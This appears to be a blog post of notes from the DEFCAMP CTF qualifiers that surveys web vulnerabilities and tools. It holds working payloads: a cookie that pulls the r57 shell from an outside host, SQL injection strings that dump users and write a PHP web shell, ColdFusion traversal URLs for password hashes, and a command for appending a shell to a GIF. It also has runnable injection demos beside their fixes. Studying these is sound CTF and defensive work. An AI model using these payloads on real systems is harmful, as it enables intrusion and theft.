Last weekend I played some of the DEFCAMP CTF Quals. It was pretty intense. For (my own) organizational purposes, I made a list of all the technologies and vulnerabilities found in this CTF, some based on my team's game, some based on the CTF write-ups git repo.
Remote File Inclusion and Local File Inclusion Vulnerabilities
In Remote File Inclusion (RFI) the application includes a file whose path is taken from user input, and the path is allowed to be a URL, so an attacker can make the server fetch and execute code hosted on a machine she controls. The code runs with the privileges of the web server, and the same entry point can be used to serve client-side payloads to other visitors. PHP's include() and require() with a user-controlled argument are the classic case (fetching remote URLs additionally requires allow_url_include to be enabled).
Local File Inclusion (LFI) is the same flaw restricted to files already on the server, such as /etc/passwd, log files, or something the attacker previously uploaded. It is commonly chained with a file upload form that does not properly sanitize what is uploaded.
A related case is an upload form that only accepts some extensions (such as JPG or PNG) but performs the check on the client side. Here an attacker can tamper with the HTTP request and upload a PHP web shell directly (with a .php extension, for example). I've shown examples of this attack in the Natas post. There I've explained that the trick was to rename a PHP shell to one of these safe extensions.
TimThumb and LFI
With TimThumb 1.33, an attacker is able to upload a shell by appending it to an image and hosting that image on a host whose name contains one of the domains TimThumb trusts (the check was a substring match, so a look-alike subdomain passes). TimThumb fetches the image into its cache folder under a file name derived from the MD5 of the full URL of the shell. The last step is to include the cached file from that folder through an LFI. Check this example of LFI exploitation.
CMS Mini and RFI
An example of an RFI vulnerability in CMS Mini was explored using curl:
ApPHP and Remote Code Execution
ApPHP is a blog script known for several vulnerabilities, including remote code execution (RCE). An example of an RCE exploit for ApPHP can be seen here. A good start is to check PHP's disable_functions directive to see which dangerous functions are still callable on the server. The exploit sends the code to include in a cookie and the include() call in the request:
GET request:
  ?asdf);print_r(scandir(implode($_COOKIE))=/
  Cookie: 0=include
POST request:
  0=include/myfile.php
  Cookie: 0=http://www.r57shell.net/shell/r57.txt
Gitlist and Remote Command Execution
GitList is a web front end for browsing git repositories in a browser. Versions before 0.5.0 allow remote attackers to execute arbitrary commands through the shell, a command injection: part of the request path ends up unescaped in a git command line. Exploits for this vulnerability can be seen at hatriot, at packet storm, at 1337day, and at exploit-db.
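The GitList bug is the general command injection pattern: user input pasted into a command line that a shell parses. The following Python script is an added illustration (my code, not GitList's and not from the CTF write-ups): a grep wrapper over a constructed temporary directory stands in for GitList's git command, with the injectable form beside the hardened one. The directory, its file and the payload are all made up for the demo.

```python
import os
import subprocess
import tempfile

# Constructed sample "repository": one directory with one file to search.
REPO = tempfile.mkdtemp(prefix="repo_")
with open(os.path.join(REPO, "notes.txt"), "w") as fh:
    fh.write("todo: rotate keys\nflag{constructed-sample}\n")


def vulnerable_search(query):
    """Injectable wrapper: the search term is pasted into a command line that
    the shell parses, so quotes and ';' in the term become shell syntax."""
    cmd = 'grep -rnF "%s" %s' % (query, REPO)
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL)
    return proc.stdout


def safe_search(query):
    """Hardened wrapper: argv list, no shell, and '--' so a term starting with
    '-' cannot be read as a grep option. The term is only ever a pattern."""
    proc = subprocess.run(["grep", "-rnF", "--", query, REPO],
                          capture_output=True, text=True, stdin=subprocess.DEVNULL)
    return proc.stdout


# Closes the double quote, ends the grep command, runs our own command, then
# opens a new quote so the rest of the original line stays syntactically valid.
# Assembled command: grep -rnF "x" /dev/null; echo INJECTED; echo "" <REPO>
PAYLOAD = 'x" /dev/null; echo INJECTED; echo "'


if __name__ == "__main__":
    print("vulnerable:", repr(vulnerable_search(PAYLOAD)))
    print("safe:      ", repr(safe_search(PAYLOAD)))
```

If a shell really is required (pipes, globs), quote each untrusted piece with shlex.quote(); but the argv-list form is the fix to reach for first, since it removes the shell from the path entirely.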
In this CTF, the following command could be used to look for the flag:
LibreOffice's Socket Connections
LibreOffice has a binary, soffice.bin, that can accept UNO socket connections on port 2002 (in this CTF, on the VPN's localhost).
For instance, the unoconv command converts a file to any format LibreOffice supports. Its -c (--connection) flag sets the connection string the client uses to reach a running LibreOffice instance; with -l (--listener) unoconv can instead start LibreOffice listening on that address.
From the documentation, the default connection string is:
Default connection string is "socket,host=localhost,port=2002;urp;StarOffice.ComponentContext"
Therefore, you can connect to the socket and have LibreOffice convert any file its process can read (such as /flag.txt) to, say, a PDF:
$ unoconv --connection 'socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext' -f pdf /flag.txt
An example of a payload can be seen here.
ColdFusion and Local File Disclosure
ColdFusion is a web application development platform that dates back to the 1990s. It has its own interpreted language, CFML (in .cfm pages), running on a Java backend.
The problem is that ColdFusion applications have been hit by a variety of attacks, including Local File Disclosure (LFD) and SQL injection (SQLi). Add the fact that the ColdFusion service is frequently run as a highly privileged account, and a single bug turns into a very exposed host.
SQL Injection (SQLi)
SQL Injection is a classic attack where untrusted input is concatenated into a SQL query and ends up being parsed as SQL. Likely injection points are parameters that feed a query, such as index.php?id=1. I showed some of these exploits in my Natas post.
In this CTF, these were some of the exploits that could be used:
- List users, where 0x3a is the hexadecimal for the colon (:) used as a separator:
UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email),3 FROM cms.users--
- Read the password file (MySQL's LOAD_FILE() needs the FILE privilege):
UNION ALL SELECT 1,LOAD_FILE("/etc/passwd"),3--
- Write a PHP shell to URL/shell.php that executes whatever is passed in the x parameter (needs the FILE privilege and a web root writable by the database user; based on this):
UNION ALL SELECT 1,'<?php header("Content-Type: text/plain;charset=utf-8"); echo system($_GET["x"]); ?>',3 INTO OUTFILE '/var/www/html/shell.php'--
Notice the trailing pair of hyphens --, which tells most database servers to treat the remainder of the statement as a comment; it neutralizes the trailing single quote left over from the original query. In MySQL the marker must be followed by a space to count as a comment, which is why payloads are often written -- - (the second hyphen keeps the space from being trimmed). To learn more about how to mitigate SQLi, I recommend OWASP's SQLi Prevention Cheat Sheet and this nice guide for SQLi mitigation by OWASP OWTF.
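The UNION and trailing-comment trick, as an added runnable example (mine, not from the CTF or the write-ups): a query built by string concatenation beside the same query with a bound parameter, run against a constructed in-memory SQLite table that stands in for cms.users. SQLite is used so it runs anywhere; the page's payloads target MySQL, so concat()/0x3a there become ||/char(58) here, and the sample hashes are md5 of "password" and "123456".

```python
import sqlite3


def build_db():
    """Constructed sample schema: a users table to leak and a posts table
    that the vulnerable page actually queries."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.org');
        INSERT INTO users VALUES (2, 'bob',   'e10adc3949ba59abbe56e057f20f883e', 'bob@example.org');
        CREATE TABLE posts(id INTEGER, title TEXT, body TEXT);
        INSERT INTO posts VALUES (1, 'Hello', 'first post');
    """)
    return db


DB = build_db()


def vulnerable_lookup(title, db=DB):
    """page.php?title=... built by concatenation: the input lands between two
    single quotes and whatever it contains is parsed as SQL."""
    sql = "SELECT id, title, body FROM posts WHERE title='" + title + "'"
    return db.execute(sql).fetchall()


def safe_lookup(title, db=DB):
    """Same query with a bound parameter: the value never reaches the parser,
    so it can only ever be compared as data."""
    return db.execute(
        "SELECT id, title, body FROM posts WHERE title=?", (title,)
    ).fetchall()


# Close the open quote, UNION in exactly three columns to match the original
# SELECT, and comment out the quote the application appends after our input.
# Resulting SQL: ... WHERE title='x' UNION ALL SELECT 1, ..., 3 FROM users--'
UNION_PAYLOAD = (
    "x' UNION ALL SELECT 1, username || char(58) || password || char(58) || email, 3 "
    "FROM users--"
)


def dump_users(db=DB):
    """Runs the injection through the vulnerable query and returns the
    user:hash:email strings it leaked (an empty list means it failed)."""
    return [row[1] for row in vulnerable_lookup(UNION_PAYLOAD, db)]


if __name__ == "__main__":
    print("leaked via concatenation:", dump_users())
    print("same payload, bound parameter:", safe_lookup(UNION_PAYLOAD))
```

The bound-parameter version returns nothing for the payload because the whole string is compared against the title column as a literal; that, not input filtering, is the fix the OWASP cheat sheet recommends.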
By the way, it's useful in general to know HTML URL Encoding to craft these URLs.
CesarFTP 0.99g and Buffer Overflow
File Disclosure of Password Hashes
This vulnerability gives access to the administrator password hash, which can be replayed against the login form within its roughly 30-second window, and from the Administration panel a shell can then be written. The main idea is a directory traversal to password.properties, whose contents can be used to log in to the server.
Ingredients of this attack are:
The target must have the ColdFusion administrator available, which by default is mapped to CFIDE/administrator/enter.cfm. If it returns a 500, switch to HTTPS.
At the ColdFusion administrator, verify the version, and then use these traversals (the %00 null byte truncates the path so the suffix the application appends is ignored):
(Version 6): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
(Version 7): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en
(Version 8): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
(All versions): http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
- Now a shell can be written to a file under the web root via Schedule New Task (a scheduled task can fetch a URL and save the response to a file). See detailed instructions at blackhatlib, at infointox, at gnucitizen, at kaoticcreations, at cyberguerilla, at jumpespjump, and at hexale.
Vulnerability scanners can be useful for several problems. For instance, RIPS is a static source code analyzer for PHP.
Scapy is a Python library for crafting and sending packets. It can be useful for problems such as port knocking, where a sequence of packets to specific ports has to be sent in order before a service opens. For illustration, check this example from PHD CTF 2011 and this from ASIS CTF 2014. Check this project too.
To run that project's tool (after downloading it) just do:
java -jar paranoia.jar
HTTP/HTTPS Request Tampering
Very useful for the file inclusion and upload problems (but not limited to them):
- Tamper Data: view and modify HTTP/HTTPS headers.
- Burp: a Java application to secure or penetrate web applications.
At some point I'm going to dedicate an entire post for Wireshark, but for this CTF the important things to know were:
- Look for POST requests:
http.request.method == "POST"
- Submit the found data (same username, nonce, and password) with the command:
$ curl --data 'user=manager&nonce=7413734ab666ce02cf27c9862c96a8e7&pass=3ecd6317a873b18e7dde351ac094ee3b' HOST
Exif data extractor:
ExifTool is used for reading, writing, and manipulating image metadata. To build it from the tarball and run it on a file:
$ tar -xf Image-ExifTool-9.74.tar.gz
$ cd Image-ExifTool-9.74/
$ perl Makefile.PL
$ make test
$ sudo make install
$ exiftool IMAGEFILE
In the Shell
- Hexadecimal decoders are essential. You can use Python's hex codec (Python 2 syntax; Python 3 has bytes.fromhex() instead):
$ python -c 'print "2f722f6e6574736563".decode("hex")'
/r/netsec
or the command line xxd (on RPM-based distributions it ships in vim-common):
$ yum install vim-common
$ xxd -r -p <<< 2f722f6e6574736563
/r/netsec
- Base64 decoders are also essential:
$ base64 --decode <<< BASE64STRING > OUTPUT
- nmap, obviously. You can call it from Python scripts with the subprocess module (pass the arguments as a list rather than a shell string, so a hostile target string cannot inject commands):
import subprocess
print("[*] Scanning for open ports using nmap")
subprocess.call(["nmap", "-sS", "-sV", "-T4", "-p", "22-2048", base_URL])
- tee is nice to store and view the output of another command. It can be very useful with curl. A simple example:
$ ls | tee file
- chattr changes file attributes on a Linux file system. For example, chattr +i on a file makes it immutable, so it cannot be removed or modified until the attribute is cleared (useful for zombie process hunting).
- nm is useful for listing symbols from object files.
- md5 hashing is used all the time:
$ echo -n password | md5sum
5f4dcc3b5aa765d61d8327deb882cf99  -
- You might want to append a shell code to an image (for example, a GIF file):
$ cat PHP-shell.php >> fig.gif
- Now a special one: Windows! One of the trivia questions in this CTF. How to disable the Windows XP Firewall from the command line:
netsh firewall set opmode mode=DISABLE